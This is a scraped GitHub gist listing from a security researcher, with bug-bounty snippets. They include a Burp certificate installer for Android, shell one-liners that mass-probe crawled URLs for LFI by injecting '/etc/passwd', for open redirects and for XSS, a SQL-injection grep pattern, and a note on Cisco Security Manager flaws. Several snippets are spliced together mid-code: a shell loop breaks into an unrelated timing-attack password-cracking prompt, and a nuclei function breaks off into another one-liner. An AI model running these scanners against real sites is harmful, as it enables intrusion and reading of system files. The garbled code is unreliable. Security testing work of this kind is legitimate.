Dwi Siswanto dwisiswant0

@dwisiswant0
dwisiswant0 / extract.sh
Created April 20, 2021 21:37
CVE refs extractor
#!/bin/bash
CIRCL="https://cve.circl.lu"
extract() {
curl -sL "${1}" | xmllint --html --xpath "${2}" - 2>/dev/null
}
COUNT=1
for i in $(extract "${CIRCL}" "//td[@data-type='ID']/a/text()"); do
"""
The function check_password(password) is used by a safe with 4-digits passwords, and is
susceptible to timing attacks. More specifically, it takes it around 0.1 seconds to check
one digit – so brute-forcing all the possible combinations will take around 1,500 hours.
Can you implement a way to crack its password in less than a minute?
"""
import time
import sys # ignore

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. The release notes did not mention the vulnerabilities, and no security advisories were published. All payloads are processed in the context of NT AUTHORITY\SYSTEM.

@dwisiswant0
dwisiswant0 / install_burp_cert.sh
Created November 13, 2020 18:45
10-line to Install BurpSuite Certificate on Android 7+
#!/bin/bash
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*
@dwisiswant0
dwisiswant0 / git-io-custom-url.md
Created August 21, 2020 22:37 — forked from dikiaap/git-io-custom-url.md
git.io custom URL

Command:

curl https://git.io/ -i -F "url=https://github.com/YOUR_GITHUB_URL" -F "code=YOUR_CUSTOM_NAME"

Custom URLs can be created only for targets matching:

  • https://github.com/*
  • https://*.github.com
  • https://*.github.com/*
  • https://*.github.io
@dwisiswant0
dwisiswant0 / bash_aliases.sh
Last active March 12, 2024 17:17
One-liner to get Open-redirect & LFI
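lfi() {
# Pass each URL as a positional argument so crawled input is never parsed as shell code.
gau "$1" | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "$1" 2>&1 | grep -q "root:x" && echo "VULN! $1"' _ %
}
open-redirect() {
# LHOST is passed as a second argument: a local variable is not visible inside the child sh.
local LHOST="http://localhost"; gau "$1" | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "$1" 2>&1 | grep -q "Location: $2" && echo "VULN! $1"' _ % "$LHOST"
}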
@dwisiswant0
dwisiswant0 / nucleir.sh
Last active May 3, 2022 12:39
Automate nuclei
nucleir() {
local TPL="$HOME/Documents/nuclei-templates"
[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
[[ -z "${2}" ]] && { echo "Input target?"; return; }
local T=""
for i in `ls -1d ${TPL}/*/`; do
if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
@dwisiswant0
dwisiswant0 / wp-plugin-sqli.json
Created July 1, 2020 17:08
gf Pattern to Detect SQL Injection in WordPress Plugins # Case-study: https://dl.packetstormsecurity.net/papers/general/detect-sql-wp.pdf
{
"flags": "-HanrPz",
"pattern": "('|\")SELECT[\\S+\\n\\r\\s]+FROM[\\S+\\n\\r\\s]+('|\").*(\\.|\\{).*[\\S+\\n\\r\\s]+;"
}
@dwisiswant0
dwisiswant0 / google-dorks
Created June 18, 2020 11:15 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!